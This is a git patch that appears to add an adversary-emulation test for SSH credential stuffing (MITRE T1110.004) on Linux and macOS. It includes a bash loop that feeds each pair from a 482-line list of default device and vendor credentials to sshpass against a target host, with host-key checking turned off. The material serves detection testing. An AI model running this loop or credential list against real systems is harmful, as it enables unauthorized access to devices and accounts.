From 8b308641929003da70f18d9a70f9468a2842af86 Mon Sep 17 00:00:00 2001
From: madhavbhatt <madhav.bhatt73@gmail.com>
Date: Mon, 7 Jun 2021 15:17:31 -0700
Subject: [PATCH] T1110.004 : SSH Credential Stuffing FROM Linux , MacOS

---
 atomics/T1110.004/T1110.004.yaml            |  64 +++
 atomics/T1110.004/src/credstuffuserpass.txt | 482 ++++++++++++++++++++
 2 files changed, 546 insertions(+)
 create mode 100644 atomics/T1110.004/T1110.004.yaml
 create mode 100644 atomics/T1110.004/src/credstuffuserpass.txt

diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml
new file mode 100644
index 00000000..29d8c304
--- /dev/null
+++ b/atomics/T1110.004/T1110.004.yaml
@@ -0,0 +1,64 @@
+---
+attack_technique: T1110.004
+display_name: 'Brute Force: Credential Stuffing'
+
+atomic_tests:
+- name: SSH Credential Stuffing From Linux
+  description: |
+    Using username,password combination from a password dump to login over SSH.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    target_host:
+      description: IP Address / Hostname you want to target.
+      type: String
+      default: localhost
+
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires SSHPASS
+      prereq_command: |
+        if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
+- name: SSH Credential Stuffing From MacOS
+  description: |
+    Using username,password combination from a password dump to login over SSH.
+
+  supported_platforms:
+    - macos
+
+  input_arguments:
+    target_host:
+      description: IP Address / Hostname you want to target.
+      type: String
+      default: localhost
+
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires SSHPASS
+      prereq_command: |
+        if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+        brew install hudochenkov/sshpass/sshpass
+
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
diff --git a/atomics/T1110.004/src/credstuffuserpass.txt b/atomics/T1110.004/src/credstuffuserpass.txt
new file mode 100644
index 00000000..ed0295f7
--- /dev/null
+++ b/atomics/T1110.004/src/credstuffuserpass.txt
@@ -0,0 +1,482 @@
+ADMINISTRATOR:ADMINISTRATOR
+ADMN:admn
+Administrator:3ware
+Administrator:admin
+Administrator:changeme
+Administrator:ganteng
+Administrator:letmein
+Administrator:password
+Administrator:pilou
+Administrator:smcadmin
+Any:12345
+CSG:SESAME
+Cisco:Cisco
+D-Link:D-Link
+DTA:TJM
+GEN1:gen1
+GEN2:gen2
+GlobalAdmin:GlobalAdmin
+HTTP:HTTP
+IntraStack:Asante
+IntraSwitch:Asante
+JDE:JDE
+LUCENT01:UI-PSWD-01
+LUCENT02:UI-PSWD-02
+MDaemon:MServer
+MICRO:RSX
+Manager:Manager
+Manager:friend
+NAU:NAU
+NETWORK:NETWORK
+NICONEX:NICONEX
+PBX:PBX
+PFCUser:240653C9467E45
+PRODDTA:PRODDTA
+PSEAdmin:$secure$
+PlcmSpIp:PlcmSpIp
+Polycom:SpIp
+RMUser1:password
+SYSADM:sysadm
+Sweex:Mysweex
+USERID:PASSW0RD
+User:Password
+VNC:winterm
+VTech:VTech
+ZXDSL:ZXDSL
+acc:acc
+adfexc:adfexc
+admin:0
+admin:0000
+admin:1111
+admin:11111111
+admin:123
+admin:1234
+admin:123456
+admin:1234567890
+admin:1234admin
+admin:2222
+admin:22222
+admin:3477
+admin:3ascotel
+admin:7ujMko0admin
+admin:7ujMko0vizxv
+admin:9999
+admin:Admin
+admin:AitbISP4eCiG
+admin:Ascend
+admin:BRIDGE
+admin:Intel
+admin:MiniAP
+admin:NetCache
+admin:NetICs
+admin:OCS
+admin:P@55w0rd!
+admin:PASSWORD
+admin:Protector
+admin:SMDR
+admin:SUPER
+admin:Symbol
+admin:TANDBERG
+admin:_Cisco
+admin:access
+admin:admin
+admin:admin117.35.97.74
+admin:admin123
+admin:admin1234
+admin:administrator
+admin:adminttd
+admin:adslolitec
+admin:adslroot
+admin:adtran
+admin:articon
+admin:asante
+admin:ascend
+admin:asd
+admin:atc123
+admin:atlantis
+admin:backdoor
+admin:barricade
+admin:barricadei
+admin:bintec
+admin:cableroot
+admin:changeme
+admin:cisco
+admin:comcomcom
+admin:conexant
+admin:default
+admin:diamond
+admin:enter
+admin:epicrouter
+admin:extendnet
+admin:fliradmin
+admin:giraff
+admin:hagpolm1
+admin:hello
+admin:help
+admin:hp.com
+admin:ironport
+admin:isee
+admin:jvc
+admin:kont2004
+admin:letmein
+admin:leviton
+admin:linga
+admin:meinsma
+admin:michaelangelo
+admin:michelangelo
+admin:microbusiness
+admin:motorola
+admin:mu
+admin:my_DEMARC
+admin:netadmin
+admin:noway
+admin:oelinux123
+admin:operator
+admin:p-assword
+admin:pass
+admin:password
+admin:passwort
+admin:pento
+admin:pfsense
+admin:private
+admin:public
+admin:pwp
+admin:radius
+admin:rmnetlm
+admin:root
+admin:secure
+admin:service
+admin:setup
+admin:sitecom
+admin:smallbusiness
+admin:smcadmin
+admin:speedxess
+admin:superuser
+admin:support
+admin:switch
+admin:synnet
+admin:sysAdmin
+admin:system
+admin:tech
+admin:ubnt
+admin:visual
+admin:w2402
+admin:wbox
+admin:xad$l#12
+admin:xad$|#12
+admin:zoomadsl
+admin2:changeme
+administrator:administrator
+administrator:changeme
+adminstat:OCS
+adminstrator:changeme
+adminttd:adminttd
+adminuser:OCS
+adminview:OCS
+alpine:alpine
+anonymous:Exabyte
+anonymous:any@
+apc:apc
+at4400:at4400
+bbsd-client:NULL
+bbsd-client:changeme2
+bciim:bciimpw
+bcim:bcimpw
+bcms:bcmspw
+bcnas:bcnaspw
+bcnas:pcnaspw
+blue:bluepw
+browse:browsepw
+browse:looker
+cablecom:router
+cablemodem:robotics
+cac_admin:cacadmin
+cas:cascade
+ccrusr:ccrusr
+cellit:cellit
+cgadmin:cgadmin
+cisco:cisco
+citel:citel
+client:client
+cmaker:cmaker
+comcast:1234
+corecess:corecess
+craft:craft
+craft:craftpw
+craft:crftpw
+cusadmin:highspeed
+cust:custpw
+customer:none
+dadmin:dadmin01
+davox:davox
+debug:d.e.b.u.g
+debug:synnet
+default:antslq
+default:default
+default:password
+deskalt:password
+deskman:changeme
+desknorm:password
+deskres:password
+device:device
+dhs3mt:dhs3mt
+dhs3pms:dhs3pms
+diag:danger
+diag:switch
+disttech:4tas
+draytek:1234
+e250:e250changeme
+e500:e500changeme
+echo:User
+echo:echo
+eng:engineer
+enquiry:enquirypw
+field:support
+guest:1111
+guest:12345
+guest:123456
+guest:User
+guest:guest
+guest:xc3511
+halt:tlah
+helpdesk:OCS
+hsa:hsadb
+hscroot:abc123
+iclock:timely
+images:images
+inads:inads
+inads:indspw
+init:initpw
+install:llatsni
+install:secret
+installer:installer
+intel:intel
+intermec:intermec
+intermec:intermec1QTPS
+kermit:kermit
+l2:l2
+l3:l3
+locate:locatepw
+login:0
+login:1111
+login:8429
+login:access
+login:admin
+login:password
+lp:lp
+m1122:m1122
+maint:maint
+maint:maintpw
+maint:ntacdmax
+maint:rwmaint
+manage:!manage
+manager:admin
+manager:change_on_install
+manager:friend
+manager:manager
+manager:sys
+manuf:xxyyzz
+mediator:mediator
+mg3500:merlin
+mlusr:mlusr
+monitor:monitor
+mother:fucker
+mtch:mtch
+mtcl:mtcl
+naadmin:naadmin
+netangr:attack
+netman:netman
+netopia:netopia
+netrangr:attack
+netscreen:netscreen
+nms:nmspw
+nokai:nokai
+nokia:nokia
+none:0
+none:admin
+op:op
+op:operator
+operator:$chwarzepumpe
+operator:1234
+operator:operator
+oracle:oracle
+patrol:patrol
+piranha:piranha
+piranha:q
+poll:tech
+public:public
+radware:radware
+rapport:r@p8p0r+
+rcust:rcustpw
+readonly:lucenttech2
+readwrite:lucenttech1
+recovery:recovery
+replicator:replicator
+ro:ro
+root:000000
+root:1111
+root:1234
+root:12345
+root:123456
+root:1234567890
+root:1234qwer
+root:123qwe
+root:1q2w3e4r5
+root:3ep5w2u
+root:54321
+root:666666
+root:7ujMko0admin
+root:7ujMko0vizxv
+root:888888
+root:Admin
+root:Cisco
+root:GMB182
+root:LSiuY7pOmZG2s
+root:Mau'dib
+root:PASSWORD
+root:ROOT500
+root:Serv4EMC
+root:Zte521
+root:abc123
+root:admin
+root:admin1234
+root:admin_1
+root:ahetzip8
+root:alpine
+root:anko
+root:antslq
+root:ascend
+root:attack
+root:avtech
+root:b120root
+root:bananapi
+root:blender
+root:calvin
+root:changeme
+root:cms500
+root:comcom
+root:coolphoenix579
+root:davox
+root:default
+root:dreambox
+root:fivranne
+root:ggdaseuaimhrke
+root:hi3518
+root:iDirect
+root:ikwb
+root:ikwd
+root:jauntech
+root:juantech
+root:jvbzd
+root:klv123
+root:klv1234
+root:letacla
+root:maxided
+root:oelinux123
+root:openssh
+root:openvpnas
+root:orion99
+root:pa55w0rd
+root:pass
+root:password
+root:permit
+root:realtek
+root:root
+root:tini
+root:tslinux
+root:ubnt
+root:user
+root:vizxv
+root:wyse
+root:xc3511
+root:xmhdipc
+root:zlxx.
+root:zte9x15
+router:router
+rw:rw
+rwa:rwa
+scmadmin:scmchangeme
+scout:scout
+secret:secret
+secure:secure
+security:security
+service:smile
+setup:changeme
+setup:changeme!
+setup:setup
+smc:smcadmin
+spcl:0
+storwatch:specialist
+stratacom:stratauser
+su:super
+super:5777364
+super:super
+super:surt
+super.super:master
+superadmin:secret
+superman:21241036
+superman:talent
+superuser:123456
+superuser:admin
+supervisor:PlsChgMe!
+supervisor:PlsChgMe1
+supervisor:supervisor
+supervisor:zyad1234
+support:123
+support:1234
+support:12345
+support:123456
+support:admin
+support:h179350
+support:login
+support:support
+support:supportpw
+support:zlxx.
+sys:uplink
+sysadm:Admin
+sysadm:PASS
+sysadm:anicust
+sysadm:sysadm
+sysadmin:PASS
+sysadmin:password
+sysadmin:sysadmin
+system:change_on_install
+system:password
+system:sys
+system/manager:sys/change_on_install
+target:password
+teacher:password
+tech:ANYCOM
+tech:ILMI
+tech:field
+tech:tech
+telco:telco
+telecom:telecom
+tellabs:tellabs#1
+telnet:telnet
+temp1:password
+test:test
+tiara:tiaranet
+tiger:tiger123
+topicalt:password
+topicnorm:password
+topicres:password
+ubnt:ubnt
+user:123456
+user:pass
+user:password
+user:public
+user:tivonpw
+user:user
+vcr:NetVCR
+volition:volition
+vt100:public
+webadmin:1234
+webadmin:webadmin
+websecadm:changeme
+wlse:wlsedb
+wradmin:trancell
+write:private
+xd:xd
+xxx:cascade
+zyfwp:PrOw!aN_fXp